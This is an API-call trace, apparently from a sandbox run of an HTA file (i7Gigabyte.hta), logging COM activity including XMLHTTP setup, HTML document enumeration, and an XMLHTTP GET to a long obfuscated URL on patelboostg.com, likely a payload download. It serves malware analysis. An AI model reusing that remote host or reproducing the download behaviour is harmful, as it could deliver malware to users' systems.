[0085.492] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x76ec3e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399c64 | out: ppvObject=0x399c64*=0x0) returned 0x80004002
[0085.492] XMLHTTP:IUnknown:AddRef (This=0x29c9f20) returned 0x2
[0085.492] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cbc7c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399d24 | out: ppvObject=0x399d24*=0x29c9f20) returned 0x0
[0085.492] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x398c84 | out: ppvObject=0x398c84*=0x29c9f20) returned 0x0
[0085.492] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cdda28*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x72cbc81c*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x398c58 | out: ppvObject=0x398c58*=0x0) returned 0x80004002
[0085.492] GetCurrentThreadId () returned 0xe84
[0085.492] GetCurrentThreadId () returned 0xe84
[0085.492] GetCurrentThreadId () returned 0xe84
[0085.493] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cdda38*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x72cdda38*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x398c60 | out: ppvObject=0x398c60*=0x0) returned 0x80004002
[0085.493] GetCurrentThreadId () returned 0xe84
[0085.493] GetCurrentThreadId () returned 0xe84
[0085.493] GetCurrentThreadId () returned 0xe84
[0085.493] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde27c*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x72cdda48*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x398c80 | out: ppvObject=0x398c80*=0x152c08) returned 0x0
[0085.493] GetCurrentThreadId () returned 0xe84
[0085.493] GetCurrentThreadId () returned 0xe84
[0085.493] GetCurrentThreadId () returned 0xe84
[0085.493] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152c08
[0085.494] IHTMLDocument2:get_all (in: This=0x152c08, p=0x398c74 | out: p=0x398c74*=0x152c58) returned 0x0
[0085.494] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x152c38
[0085.495] IHTMLElementCollection:get_length (in: This=0x152c58, p=0x398c6c | out: p=0x398c6c*=10) returned 0x0
[0085.495] IHTMLElementCollection:item (in: This=0x152c58, name=0x398be4*(varType=0x3, wReserved1=0x0, wReserved2=0x100, wReserved3=0x11, varVal1=0x0, varVal2=0x0), index=0x398bf4*(varType=0x0, wReserved1=0x3e, wReserved2=0x8e6c, wReserved3=0x39, varVal1=0x1190ed0, varVal2=0x398c2c), pdisp=0x398c5c | out: pdisp=0x398c5c*=0x152c68) returned 0x0
[0085.495] GetProcAddress (hModule=0x757f0000, lpProcName=0x93) returned 0x757f4c28
[0085.495] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152c68
[0085.495] IUnknown:QueryInterface (in: This=0x152c68, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398c70 | out: ppvObject=0x398c70*=0x152c98) returned 0x0
[0085.495] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152c98
[0085.496] IHTMLDocument2:get_forms (in: This=0x152c98, p=0x398c7c | out: p=0x398c7c*=0x18141c) returned 0x0
[0085.510] IUnknown:Release (This=0x152c98) returned 0x0
[0085.510] IUnknown:Release (This=0x152c68) returned 0x0
[0085.510] IHTMLElementCollection:item (in: This=0x152c58, name=0x398be4*(varType=0x3, wReserved1=0x0, wReserved2=0x100, wReserved3=0x11, varVal1=0x1, varVal2=0x0), index=0x398bf4*(varType=0x0, wReserved1=0x3e, wReserved2=0x8e6c, wReserved3=0x39, varVal1=0x1190ed0, varVal2=0x398c2c), pdisp=0x398c5c | out: pdisp=0x398c5c*=0x152c68) returned 0x0
[0085.511] IUnknown:QueryInterface (in: This=0x152c68, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398c70 | out: ppvObject=0x398c70*=0x152c98) returned 0x0
[0085.511] IHTMLDocument2:get_forms (in: This=0x152c98, p=0x398c7c | out: p=0x398c7c*=0x18141c) returned 0x0
[0085.511] IUnknown:Release (This=0x152c98) returned 0x0
[0085.511] IUnknown:Release (This=0x152c68) returned 0x0
[0085.513] IHTMLElementCollection:item (in: This=0x152c58, name=0x398be4*(varType=0x3, wReserved1=0x0, wReserved2=0x100, wReserved3=0x11, varVal1=0x2, varVal2=0x0), index=0x398bf4*(varType=0x0, wReserved1=0x3e, wReserved2=0x8e6c, wReserved3=0x39, varVal1=0x1190ed0, varVal2=0x398c2c), pdisp=0x398c5c | out: pdisp=0x398c5c*=0x152c68) returned 0x0
[0085.513] IUnknown:QueryInterface (in: This=0x152c68, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398c70 | out: ppvObject=0x398c70*=0x152c98) returned 0x0
[0085.513] IHTMLDocument2:get_forms (in: This=0x152c98, p=0x398c7c | out: p=0x398c7c*=0x18141c) returned 0x0
[0085.514] IUnknown:Release (This=0x152c98) returned 0x0
[0085.514] IUnknown:Release (This=0x152c68) returned 0x0
[0085.514] IHTMLElementCollection:item (in: This=0x152c58, name=0x398be4*(varType=0x3, wReserved1=0x0, wReserved2=0x100, wReserved3=0x11, varVal1=0x3, varVal2=0x0), index=0x398bf4*(varType=0x0, wReserved1=0x3e, wReserved2=0x8e6c, wReserved3=0x39, varVal1=0x1190ed0, varVal2=0x398c2c), pdisp=0x398c5c | out: pdisp=0x398c5c*=0x152c68) returned 0x0
[0085.514] IUnknown:QueryInterface (in: This=0x152c68, riid=0x72cf78bc*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x398c70 | out: ppvObject=0x398c70*=0x152c98) returned 0x0
[0085.514] IHTMLDocument2:get_forms (in: This=0x152c98, p=0x398c7c | out: p=0x398c7c*=0x18141c) returned 0x0
[0085.514] IUnknown:Release (This=0x152c98) returned 0x0
[0085.514] IUnknown:Release (This=0x152c68) returned 0x0
[0085.514] IUnknown:Release (This=0x152c58) returned 0x0
[0085.515] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152c38 | out: hHeap=0x110000) returned 1
[0085.515] IHTMLDocument2:get_url (in: This=0x152c08, p=0x398c68 | out: p=0x398c68*="file://C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0085.515] IUnknown:AddRef (This=0x13c184) returned 0x4
[0085.515] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6) returned 0x1696f0
[0085.515] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696f0 | out: hHeap=0x110000) returned 1
[0085.515] IUnknown:AddRef (This=0x13c184) returned 0x5
[0085.515] IUnknown:Release (This=0x13c184) returned 0x4
[0085.515] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x398bb0 | out: pdwScheme=0x398bb0*=0x9) returned 0x0
[0085.515] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398b80 | out: ppvObject=0x398b80*=0x13c184) returned 0x0
[0085.515] IUnknown:Release (This=0x13c184) returned 0x4
[0085.515] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398b38 | out: ppvObject=0x398b38*=0x13c184) returned 0x0
[0085.516] IUnknown:Release (This=0x13c184) returned 0x4
[0085.516] IUnknown:AddRef (This=0x13c184) returned 0x5
[0085.516] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x398bf4 | out: ppURI=0x398bf4*=0x13d18c) returned 0x0
[0085.516] IUnknown:Release (This=0x13c184) returned 0x4
[0085.516] IUnknown:QueryInterface (in: This=0x13d18c, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398bc4 | out: ppvObject=0x398bc4*=0x13d18c) returned 0x0
[0085.516] IUnknown:Release (This=0x13d18c) returned 0x2
[0085.516] IUnknown:AddRef (This=0x13d18c) returned 0x3
[0085.516] IUnknown:Release (This=0x13d18c) returned 0x2
[0085.516] IUnknown:Release (This=0x13c184) returned 0x3
[0085.516] IUnknown:Release (This=0x13d18c) returned 0x1
[0085.516] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x3
[0085.516] IUnknown:Release (This=0x152c08) returned 0x0
[0085.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152c98 | out: hHeap=0x110000) returned 1
[0085.517] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cbc82c*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x398c8c | out: ppvObject=0x398c8c*=0x0) returned 0x80004002
[0085.517] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdda58*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x398c74 | out: ppvObject=0x398c74*=0x0) returned 0x80004002
[0085.517] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x398c90 | out: ppvObject=0x398c90*=0x29c9f20) returned 0x0
[0085.517] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cdda28*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x72cbc81c*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x398c7c | out: ppvObject=0x398c7c*=0x0) returned 0x80004002
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde3e4*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x72cbc82c*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x398c8c | out: ppvObject=0x398c8c*=0x0) returned 0x80004002
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde27c*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x72cdda48*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x398c80 | out: ppvObject=0x398c80*=0x152c08) returned 0x0
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] GetCurrentThreadId () returned 0xe84
[0085.517] IHTMLDocument2:get_url (in: This=0x152c08, p=0x398c94 | out: p=0x398c94*="file://C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0085.517] IUnknown:AddRef (This=0x13c184) returned 0x4
[0085.517] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6) returned 0x1696f0
[0085.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696f0 | out: hHeap=0x110000) returned 1
[0085.517] IUnknown:AddRef (This=0x13c184) returned 0x5
[0085.517] IUnknown:Release (This=0x13c184) returned 0x4
[0085.517] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x398c08 | out: pdwScheme=0x398c08*=0x9) returned 0x0
[0085.518] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398bd8 | out: ppvObject=0x398bd8*=0x13c184) returned 0x0
[0085.518] IUnknown:Release (This=0x13c184) returned 0x4
[0085.518] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398b90 | out: ppvObject=0x398b90*=0x13c184) returned 0x0
[0085.518] IUnknown:Release (This=0x13c184) returned 0x4
[0085.518] IUnknown:AddRef (This=0x13c184) returned 0x5
[0085.518] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2ba5, dwReserved=0x0, ppURI=0x398c4c | out: ppURI=0x398c4c*=0x13d18c) returned 0x0
[0085.518] IUnknown:Release (This=0x13c184) returned 0x4
[0085.518] IUnknown:QueryInterface (in: This=0x13d18c, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398c1c | out: ppvObject=0x398c1c*=0x13d18c) returned 0x0
[0085.518] IUnknown:Release (This=0x13d18c) returned 0x2
[0085.518] IUnknown:AddRef (This=0x13d18c) returned 0x3
[0085.518] IUnknown:Release (This=0x13d18c) returned 0x2
[0085.518] IUnknown:Release (This=0x13c184) returned 0x3
[0085.518] IUnknown:Release (This=0x13d18c) returned 0x1
[0085.518] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x3
[0085.518] IUnknown:Release (This=0x152c08) returned 0x0
[0085.518] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x2
[0085.518] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x399d1c | out: ppvObject=0x399d1c*=0x29c9f20) returned 0x0
[0085.518] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde3e4*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x72cde3e4*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x399d20 | out: ppvObject=0x399d20*=0x152c08) returned 0x0
[0085.518] GetCurrentThreadId () returned 0xe84
[0085.518] GetCurrentThreadId () returned 0xe84
[0085.518] GetCurrentThreadId () returned 0xe84
[0085.519] XMLHTTP:IUnknown:Release (This=0x29c9f20) returned 0x2
[0085.519] IUnknown:AddRef (This=0x152c08) returned 0x2
[0085.519] IUnknown:Release (This=0x152c08) returned 0x1
[0085.519] XMLHTTP:IUnknown:Release (This=0x2da3a44) returned 0x0
[0085.519] XMLHTTP:IUnknown:QueryInterface (in: This=0x2da3a10, riid=0x663b5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x399d84 | out: ppvObject=0x399d84*=0x0) returned 0x80004002
[0085.537] XMLHTTP:IUnknown:QueryInterface (in: This=0x2da3a10, riid=0x663b55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x399d80 | out: ppvObject=0x399d80*=0x0) returned 0x80004002
[0085.537] XMLHTTP:IUnknown:QueryInterface (in: This=0x2da3a10, riid=0x663b5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x399d7c | out: ppvObject=0x399d7c*=0x0) returned 0x80004002
[0085.537] XMLHTTP:IUnknown:QueryInterface (in: This=0x2da3a10, riid=0x663b5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x399d78 | out: ppvObject=0x399d78*=0x0) returned 0x80004002
[0085.537] XMLHTTP:IUnknown:QueryInterface (in: This=0x2da3a10, riid=0x663b5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399d74 | out: ppvObject=0x399d74*=0x2da3a10) returned 0x0
[0085.537] XMLHTTP:IUnknown:Release (This=0x2da3a10) returned 0x1
[0085.553] XMLHTTP:IDispatch:GetIDsOfNames (in: This=0x2da3a10, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x399ea4*="open", cNames=0x1, lcid=0x409, rgDispId=0x399ec8 | out: rgDispId=0x399ec8*=1) returned 0x0
[0085.563] XMLHTTP:IUnknown:AddRef (This=0x2da3a10) returned 0x2
[0085.563] XMLHTTP:IDispatch:Invoke (in: This=0x2da3a10, dispIdMember=1, riid=0x663b0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x399e6c*(rgvarg=([0]=0x399e10*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x29b9098), [1]=0x399e20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0", varVal2=0x29b8a00), [2]=0x399e30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x29b8a00)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x39a09c, pExcepInfo=0x399e80, puArgErr=0x399e7c | out: pDispParams=0x399e6c*(rgvarg=([0]=0x399e10*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x29b9098), [1]=0x399e20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0", varVal2=0x29b8a00), [2]=0x399e30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x29b8a00)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x39a09c*(varType=0x0, wReserved1=0x5f, wReserved2=0x9f20, wReserved3=0x39, varVal1=0x0, varVal2=0x39a074), pExcepInfo=0x399e80*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x399e7c*=0x2da3a10) returned 0x0
[0087.507] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x76eb97c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399a18 | out: ppvObject=0x399a18*=0x0) returned 0x80004002
[0087.507] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x76ec3e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399a08 | out: ppvObject=0x399a08*=0x0) returned 0x80004002
[0087.507] XMLHTTP:IUnknown:AddRef (This=0x29c9f20) returned 0x2
[0087.507] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cbc7c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x399ac8 | out: ppvObject=0x399ac8*=0x29c9f20) returned 0x0
[0087.507] XMLHTTP:IUnknown:QueryInterface (in: This=0x29c9f20, riid=0x72cdd3a4*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x398a28 | out: ppvObject=0x398a28*=0x29c9f20) returned 0x0
[0087.507] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cdda28*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x72cbc81c*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3989fc | out: ppvObject=0x3989fc*=0x0) returned 0x80004002
[0087.507] GetCurrentThreadId () returned 0xe84
[0087.507] GetCurrentThreadId () returned 0xe84
[0087.507] GetCurrentThreadId () returned 0xe84
[0087.507] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cdda38*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x72cdda38*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x398a04 | out: ppvObject=0x398a04*=0x0) returned 0x80004002
[0087.507] GetCurrentThreadId () returned 0xe84
[0087.507] GetCurrentThreadId () returned 0xe84
[0087.508] GetCurrentThreadId () returned 0xe84
[0087.508] XMLHTTP:IServiceProvider:QueryService (in: This=0x29c9f20, guidService=0x72cde27c*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x72cdda48*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x398a24 | out: ppvObject=0x398a24*=0x152c68) returned 0x0
[0087.508] GetCurrentThreadId () returned 0xe84
[0087.508] GetCurrentThreadId () returned 0xe84
[0087.508] GetCurrentThreadId () returned 0xe84
[0087.519] IHTMLDocument2:get_all (in: This=0x152c68, p=0x398a18 | out: p=0x398a18*=0x180558) returned 0x0
[0087.519] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x180538
[0087.520] IHTMLElementCollection:get_length (in: This=0x180558, p=0x398a10 | out: p=0x398a10*=10) returned 0x0
